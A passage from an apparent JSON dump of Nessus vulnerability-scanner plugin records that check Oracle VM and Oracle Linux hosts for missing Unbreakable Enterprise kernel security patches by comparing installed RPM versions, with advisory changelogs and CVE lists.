value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"OracleVM Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleVM/release\", \"Host/OracleVM/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/OracleVM/release\");\nif (isnull(release) || \"OVS\" >!< release) audit(AUDIT_OS_NOT, \"OracleVM\");\nif (! preg(pattern:\"^OVS\" + \"3\\.3\" + \"(\\.[0-9]|$)\", string:release)) audit(AUDIT_OS_NOT, \"OracleVM 3.3\", \"OracleVM \" + release);\nif (!get_kb_item(\"Host/OracleVM/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"OracleVM\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"OVS3.3\", reference:\"kernel-uek-3.8.13-118.20.1.el6uek\")) flag++;\nif (rpm_check(release:\"OVS3.3\", reference:\"kernel-uek-firmware-3.8.13-118.20.1.el6uek\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel-uek / kernel-uek-firmware\");\n}\n", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-13T08:50:15", "bulletinFamily": "scanner", "description": "The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - nvme: Drop nvmeq->q_lock before dma_pool_alloc, so as to\n prevent hard lockups (Aruna Ramakrishna) [Orabug:\n 25409587]\n\n - nvme: Handle PM1725 HIL reset (Martin K. Petersen)\n [Orabug: 26277600] \n\n - char: lp: fix possible integer overflow in lp_setup\n (Willy Tarreau) [Orabug: 26403940] (CVE-2017-1000363)\n\n - ALSA: timer: Fix missing queue indices reset at\n SNDRV_TIMER_IOCTL_SELECT (Takashi Iwai) [Orabug:\n 26403956] (CVE-2017-1000380)\n\n - ALSA: timer: Fix race between read and ioctl (Takashi\n Iwai) [Orabug: 26403956] (CVE-2017-1000380)\n\n - ALSA: timer: fix NULL pointer dereference in read/ioctl\n race (Vegard Nossum) [Orabug: 26403956]\n (CVE-2017-1000380)\n\n - ALSA: timer: Fix negative queue usage by racy accesses\n (Takashi Iwai) [Orabug: 26403956] (CVE-2017-1000380)\n\n - ALSA: timer: Fix race at concurrent reads (Takashi Iwai)\n [Orabug: 26403956] (CVE-2017-1000380)\n\n - ALSA: timer: Fix race among timer ioctls (Takashi Iwai)\n [Orabug: 26403956] (CVE-2017-1000380)\n\n - ipv6/dccp: do not inherit ipv6_mc_list from parent (WANG\n Cong) [Orabug: 26404005] (CVE-2017-9077)\n\n - ocfs2: fix deadlock issue when taking inode lock at vfs\n entry points (Eric Ren) [Orabug: 26427126] -\n ocfs2/dlmglue: prepare tracking logic to avoid recursive\n cluster lock (Eric Ren) [Orabug: 26427126] - ping:\n implement proper locking (Eric Dumazet) [Orabug:\n 26540286] (CVE-2017-2671)\n\n - aio: mark AIO pseudo-fs noexec (Jann Horn) [Orabug:\n 26643598] (CVE-2016-10044)\n\n - vfs: Commit to never having exectuables on proc and\n sysfs. (Eric W. Biederman) [Orabug: 26643598]\n (CVE-2016-10044)\n\n - vfs, writeback: replace FS_CGROUP_WRITEBACK with\n SB_I_CGROUPWB (Tejun Heo) [Orabug: 26643598]\n (CVE-2016-10044)\n\n - x86/acpi: Prevent out of bound access caused by broken\n ACPI tables (Seunghun Han) [Orabug: 26643645]\n (CVE-2017-11473)\n\n - sctp: do not inherit ipv6_[mc|ac|fl]_list from parent\n (Eric Dumazet) [Orabug: 26650883] (CVE-2017-9075)\n\n - [media] saa7164: fix double fetch PCIe access condition\n (Steven Toth) [Orabug: 26675142] (CVE-2017-8831)\n\n - [media] saa7164: fix sparse warnings (Hans Verkuil)\n [Orabug: 26675142] (CVE-2017-8831)\n\n - fs: __generic_file_splice_read retry lookup on\n AOP_TRUNCATED_PAGE (Abhi Das) [Orabug: 26797306] -\n timerfd: Protect the might cancel mechanism proper\n (Thomas Gleixner) [Orabug: 26899787] (CVE-2017-10661)\n\n - scsi: scsi_transport_iscsi: fix the issue that\n iscsi_if_rx doesn", "modified": "2019-12-02T00:00:00", "id": "ORACLEVM_OVMSA-2017-0168.NASL", "href": "https://www.tenable.com/plugins/nessus/104454", "published": "2017-11-08T00:00:00", "title": "OracleVM 3.3 : Unbreakable / etc (OVMSA-2017-0168)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from OracleVM\n# Security Advisory OVMSA-2017-0168.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(104454);\n script_version(\"3.4\");\n script_cvs_date(\"Date: 2019/09/27 13:00:35\");\n\n script_cve_id(\"CVE-2016-10044\", \"CVE-2017-1000363\", \"CVE-2017-1000380\", \"CVE-2017-10661\", \"CVE-2017-11473\", \"CVE-2017-14489\", \"CVE-2017-2671\", \"CVE-2017-8831\", \"CVE-2017-9075\", \"CVE-2017-9077\");\n\n script_name(english:\"OracleVM 3.3 : Unbreakable / etc (OVMSA-2017-0168)\");\n script_summary(english:\"Checks the RPM output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote OracleVM host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - nvme: Drop nvmeq->q_lock before dma_pool_alloc, so as to\n prevent hard lockups (Aruna Ramakrishna) [Orabug:\n 25409587]\n\n - nvme: Handle PM1725 HIL reset (Martin K. Petersen)\n [Orabug: 26277600] \n\n - char: lp: fix possible integer overflow in lp_setup\n (Willy Tarreau) [Orabug: 26403940] (CVE-2017-1000363)\n\n - ALSA: timer: Fix missing queue indices reset at\n SNDRV_TIMER_IOCTL_SELECT (Takashi Iwai) [Orabug:\n 26403956] (CVE-2017-1000380)\n\n - ALSA: timer: Fix race between read and ioctl (Takashi\n Iwai) [Orabug: 26403956] (CVE-2017-1000380)\n\n - ALSA: timer: fix NULL pointer dereference in read/ioctl\n race (Vegard Nossum) [Orabug: 26403956]\n (CVE-2017-1000380)\n\n - ALSA: timer: Fix negative queue usage by racy accesses\n (Takashi Iwai) [Orabug: 26403956] (CVE-2017-1000380)\n\n - ALSA: timer: Fix race at concurrent reads (Takashi Iwai)\n [Orabug: 26403956] (CVE-2017-1000380)\n\n - ALSA: timer: Fix race among timer ioctls (Takashi Iwai)\n [Orabug: 26403956] (CVE-2017-1000380)\n\n - ipv6/dccp: do not inherit ipv6_mc_list from parent (WANG\n Cong) [Orabug: 26404005] (CVE-2017-9077)\n\n - ocfs2: fix deadlock issue when taking inode lock at vfs\n entry points (Eric Ren) [Orabug: 26427126] -\n ocfs2/dlmglue: prepare tracking logic to avoid recursive\n cluster lock (Eric Ren) [Orabug: 26427126] - ping:\n implement proper locking (Eric Dumazet) [Orabug:\n 26540286] (CVE-2017-2671)\n\n - aio: mark AIO pseudo-fs noexec (Jann Horn) [Orabug:\n 26643598] (CVE-2016-10044)\n\n - vfs: Commit to never having exectuables on proc and\n sysfs. (Eric W. Biederman) [Orabug: 26643598]\n (CVE-2016-10044)\n\n - vfs, writeback: replace FS_CGROUP_WRITEBACK with\n SB_I_CGROUPWB (Tejun Heo) [Orabug: 26643598]\n (CVE-2016-10044)\n\n - x86/acpi: Prevent out of bound access caused by broken\n ACPI tables (Seunghun Han) [Orabug: 26643645]\n (CVE-2017-11473)\n\n - sctp: do not inherit ipv6_[mc|ac|fl]_list from parent\n (Eric Dumazet) [Orabug: 26650883] (CVE-2017-9075)\n\n - [media] saa7164: fix double fetch PCIe access condition\n (Steven Toth) [Orabug: 26675142] (CVE-2017-8831)\n\n - [media] saa7164: fix sparse warnings (Hans Verkuil)\n [Orabug: 26675142] (CVE-2017-8831)\n\n - fs: __generic_file_splice_read retry lookup on\n AOP_TRUNCATED_PAGE (Abhi Das) [Orabug: 26797306] -\n timerfd: Protect the might cancel mechanism proper\n (Thomas Gleixner) [Orabug: 26899787] (CVE-2017-10661)\n\n - scsi: scsi_transport_iscsi: fix the issue that\n iscsi_if_rx doesn't parse nlmsg properly (Xin Long)\n [Orabug: 26988627] (CVE-2017-14489)\"\n );\n # https://oss.oracle.com/pipermail/oraclevm-errata/2017-November/000799.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?82da82bd\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel-uek / kernel-uek-firmware packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:kernel-uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:kernel-uek-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:3.3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/02/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/11/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/11/08\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"OracleVM Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleVM/release\", \"Host/OracleVM/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/OracleVM/release\");\nif (isnull(release) || \"OVS\" >!< release) audit(AUDIT_OS_NOT, \"OracleVM\");\nif (! preg(pattern:\"^OVS\" + \"3\\.3\" + \"(\\.[0-9]|$)\", string:release)) audit(AUDIT_OS_NOT, \"OracleVM 3.3\", \"OracleVM \" + release);\nif (!get_kb_item(\"Host/OracleVM/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"OracleVM\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"OVS3.3\", reference:\"kernel-uek-3.8.13-118.19.12.el6uek\")) flag++;\nif (rpm_check(release:\"OVS3.3\", reference:\"kernel-uek-firmware-3.8.13-118.19.12.el6uek\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel-uek / kernel-uek-firmware\");\n}\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-13T08:42:38", "bulletinFamily": "scanner", "description": "Description of changes:\n\nkernel-uek\n[3.8.13-118.19.12.el7uek]\n- nvme: Drop nvmeq->q_lock before dma_pool_alloc(), so as to prevent \nhard lockups (Aruna Ramakrishna) [Orabug: 25409587]\n\n[3.8.13-118.19.11.el7uek]\n- nvme: Handle PM1725 HIL reset (Martin K. Petersen) [Orabug: 26277600]\n- char: lp: fix possible integer overflow in lp_setup() (Willy Tarreau) \n[Orabug: 26403940] {CVE-2017-1000363}\n- ALSA: timer: Fix missing queue indices reset at \nSNDRV_TIMER_IOCTL_SELECT (Takashi Iwai) [Orabug: 26403956] \n{CVE-2017-1000380}\n- ALSA: timer: Fix race between read and ioctl (Takashi Iwai) [Orabug: \n26403956] {CVE-2017-1000380}\n- ALSA: timer: fix NULL pointer dereference in read()/ioctl() race \n(Vegard Nossum) [Orabug: 26403956] {CVE-2017-1000380}\n- ALSA: timer: Fix negative queue usage by racy accesses (Takashi Iwai) \n[Orabug: 26403956] {CVE-2017-1000380}\n- ALSA: timer: Fix race at concurrent reads (Takashi Iwai) [Orabug: \n26403956] {CVE-2017-1000380}\n- ALSA: timer: Fix race among timer ioctls (Takashi Iwai) [Orabug: \n26403956] {CVE-2017-1000380}\n- ipv6/dccp: do not inherit ipv6_mc_list from parent (WANG Cong) \n[Orabug: 26404005] {CVE-2017-9077}\n- ocfs2: fix deadlock issue when taking inode lock at vfs entry points \n(Eric Ren) [Orabug: 26427126]\n- ocfs2/dlmglue: prepare tracking logic to avoid recursive cluster lock \n(Eric Ren) [Orabug: 26427126]\n- ping: implement proper locking (Eric Dumazet) [Orabug: 26540286] \n{CVE-2017-2671}\n- aio: mark AIO pseudo-fs noexec (Jann Horn) [Orabug: 26643598] \n{CVE-2016-10044}\n- vfs: Commit to never having exectuables on proc and sysfs. (Eric W. \nBiederman) [Orabug: 26643598] {CVE-2016-10044}\n- vfs, writeback: replace FS_CGROUP_WRITEBACK with SB_I_CGROUPWB (Tejun \nHeo) [Orabug: 26643598] {CVE-2016-10044}\n- x86/acpi: Prevent out of bound access caused by broken ACPI tables \n(Seunghun Han) [Orabug: 26643645] {CVE-2017-11473}\n- sctp: do not inherit ipv6_{mc|ac|fl}_list from parent (Eric Dumazet) \n[Orabug: 26650883] {CVE-2017-9075}\n- [media] saa7164: fix double fetch PCIe access condition (Steven Toth) \n[Orabug: 26675142] {CVE-2017-8831}\n- [media] saa7164: fix sparse warnings (Hans Verkuil) [Orabug: \n26675142] {CVE-2017-8831}\n- fs: __generic_file_splice_read retry lookup on AOP_TRUNCATED_PAGE \n(Abhi Das) [Orabug: 26797306]\n- timerfd: Protect the might cancel mechanism proper (Thomas Gleixner) \n[Orabug: 26899787] {CVE-2017-10661}\n- scsi: scsi_transport_iscsi: fix the issue that iscsi_if_rx doesn", "modified": "2019-12-02T00:00:00", "id": "ORACLELINUX_ELSA-2017-3636.NASL", "href": "https://www.tenable.com/plugins/nessus/104370", "published": "2017-11-03T00:00:00", "title": "Oracle Linux 6 / 7 : Unbreakable Enterprise kernel (ELSA-2017-3636)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2017-3636.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(104370);\n script_version(\"3.9\");\n script_cvs_date(\"Date: 2019/09/27 13:00:38\");\n\n script_cve_id(\"CVE-2016-10044\", \"CVE-2017-1000363\", \"CVE-2017-1000380\", \"CVE-2017-10661\", \"CVE-2017-11473\", \"CVE-2017-14489\", \"CVE-2017-2671\", \"CVE-2017-8831\", \"CVE-2017-9075\", \"CVE-2017-9077\");\n\n script_name(english:\"Oracle Linux 6 / 7 : Unbreakable Enterprise kernel (ELSA-2017-3636)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Description of changes:\n\nkernel-uek\n[3.8.13-118.19.12.el7uek]\n- nvme: Drop nvmeq->q_lock before dma_pool_alloc(), so as to prevent \nhard lockups (Aruna Ramakrishna) [Orabug: 25409587]\n\n[3.8.13-118.19.11.el7uek]\n- nvme: Handle PM1725 HIL reset (Martin K. Petersen) [Orabug: 26277600]\n- char: lp: fix possible integer overflow in lp_setup() (Willy Tarreau) \n[Orabug: 26403940] {CVE-2017-1000363}\n- ALSA: timer: Fix missing queue indices reset at \nSNDRV_TIMER_IOCTL_SELECT (Takashi Iwai) [Orabug: 26403956] \n{CVE-2017-1000380}\n- ALSA: timer: Fix race between read and ioctl (Takashi Iwai) [Orabug: \n26403956] {CVE-2017-1000380}\n- ALSA: timer: fix NULL pointer dereference in read()/ioctl() race \n(Vegard Nossum) [Orabug: 26403956] {CVE-2017-1000380}\n- ALSA: timer: Fix negative queue usage by racy accesses (Takashi Iwai) \n[Orabug: 26403956] {CVE-2017-1000380}\n- ALSA: timer: Fix race at concurrent reads (Takashi Iwai) [Orabug: \n26403956] {CVE-2017-1000380}\n- ALSA: timer: Fix race among timer ioctls (Takashi Iwai) [Orabug: \n26403956] {CVE-2017-1000380}\n- ipv6/dccp: do not inherit ipv6_mc_list from parent (WANG Cong) \n[Orabug: 26404005] {CVE-2017-9077}\n- ocfs2: fix deadlock issue when taking inode lock at vfs entry points \n(Eric Ren) [Orabug: 26427126]\n- ocfs2/dlmglue: prepare tracking logic to avoid recursive cluster lock \n(Eric Ren) [Orabug: 26427126]\n- ping: implement proper locking (Eric Dumazet) [Orabug: 26540286] \n{CVE-2017-2671}\n- aio: mark AIO pseudo-fs noexec (Jann Horn) [Orabug: 26643598] \n{CVE-2016-10044}\n- vfs: Commit to never having exectuables on proc and sysfs. (Eric W. \nBiederman) [Orabug: 26643598] {CVE-2016-10044}\n- vfs, writeback: replace FS_CGROUP_WRITEBACK with SB_I_CGROUPWB (Tejun \nHeo) [Orabug: 26643598] {CVE-2016-10044}\n- x86/acpi: Prevent out of bound access caused by broken ACPI tables \n(Seunghun Han) [Orabug: 26643645] {CVE-2017-11473}\n- sctp: do not inherit ipv6_{mc|ac|fl}_list from parent (Eric Dumazet) \n[Orabug: 26650883] {CVE-2017-9075}\n- [media] saa7164: fix double fetch PCIe access condition (Steven Toth) \n[Orabug: 26675142] {CVE-2017-8831}\n- [media] saa7164: fix sparse warnings (Hans Verkuil) [Orabug: \n26675142] {CVE-2017-8831}\n- fs: __generic_file_splice_read retry lookup on AOP_TRUNCATED_PAGE \n(Abhi Das) [Orabug: 26797306]\n- timerfd: Protect the might cancel mechanism proper (Thomas Gleixner) \n[Orabug: 26899787] {CVE-2017-10661}\n- scsi: scsi_transport_iscsi: fix the issue that iscsi_if_rx doesn't \nparse nlmsg properly (Xin Long) [Orabug: 26988627] {CVE-2017-14489}\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2017-November/007321.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2017-November/007322.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected unbreakable enterprise kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:dtrace-modules-3.8.13-118.19.12.el6uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:dtrace-modules-3.8.13-118.19.12.el7uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/02/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/11/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/11/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6 / 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-10044\", \"CVE-2017-1000363\", \"CVE-2017-1000380\", \"CVE-2017-10661\", \"CVE-2017-11473\", \"CVE-2017-14489\", \"CVE-2017-2671\", \"CVE-2017-8831\", \"CVE-2017-9075\", \"CVE-2017-9077\"); \n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for ELSA-2017-3636\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nkernel_major_minor = get_kb_item(\"Host/uname/major_minor\");\nif (empty_or_null(kernel_major_minor)) exit(1, \"Unable to determine kernel major-minor level.\");\nexpected_kernel_major_minor = \"3.8\";\nif (kernel_major_minor != expected_kernel_major_minor)\n audit(AUDIT_OS_NOT, \"running kernel level \" + expected_kernel_major_minor + \", it is running kernel level \" + kernel_major_minor);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"dtrace-modules-3.8.13-118.19.12.el6uek-0.4.5-3.el6\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-3.8.13\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-3.8.13-118.19.12.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-3.8.13\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-debug-3.8.13-118.19.12.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-devel-3.8.13\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-debug-devel-3.8.13-118.19.12.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-devel-3.8.13\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-devel-3.8.13-118.19.12.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-doc-3.8.13\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-doc-3.8.13-118.19.12.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-firmware-3.8.13\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-firmware-3.8.13-118.19.12.el6uek\")) flag++;\n\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"dtrace-modules-3.8.13-118.19.12.el7uek-0.4.5-3.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-3.8.13\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-3.8.13-118.19.12.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-debug-3.8.13\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-debug-3.8.13-118.19.12.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-debug-devel-3.8.13\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-debug-devel-3.8.13-118.19.12.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-devel-3.8.13\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-devel-3.8.13-118.19.12.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-doc-3.8.13\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-doc-3.8.13-118.19.12.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-firmware-3.8.13\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-firmware-3.8.13-118.19.12.el7uek\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"affected kernel\");\n}\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-13T08:42:38", "bulletinFamily": "scanner", "description": "Description of changes:\n\n[2.6.39-400.297.6.el6uek]\n- l2tp: fix racy SOCK_ZAPPED flag check in l2tp_ip{,6}_bind() (Guillaume \nNault) [Orabug: 26586050] {CVE-2016-10200}\n- xfs: fix two memory leaks in xfs_attr_list.c error paths (Mateusz \nGuzik) [Orabug: 26586024] {CVE-2016-9685}\n- KEYS: Disallow keyrings beginning with ", "modified": "2019-12-02T00:00:00", "id": "ORACLELINUX_ELSA-2017-3607.NASL", "href": "https://www.tenable.com/plugins/nessus/102624", "published": "2017-08-21T00:00:00", "title": "Oracle Linux 6 : Unbreakable Enterprise kernel (ELSA-2017-3607)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2017-3607.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(102624);\n script_version(\"3.8\");\n script_cvs_date(\"Date: 2019/09/27 13:00:38\");\n\n script_cve_id(\"CVE-2016-10200\", \"CVE-2016-9604\", \"CVE-2016-9685\", \"CVE-2017-9242\");\n\n script_name(english:\"Oracle Linux 6 : Unbreakable Enterprise kernel (ELSA-2017-3607)\");\n 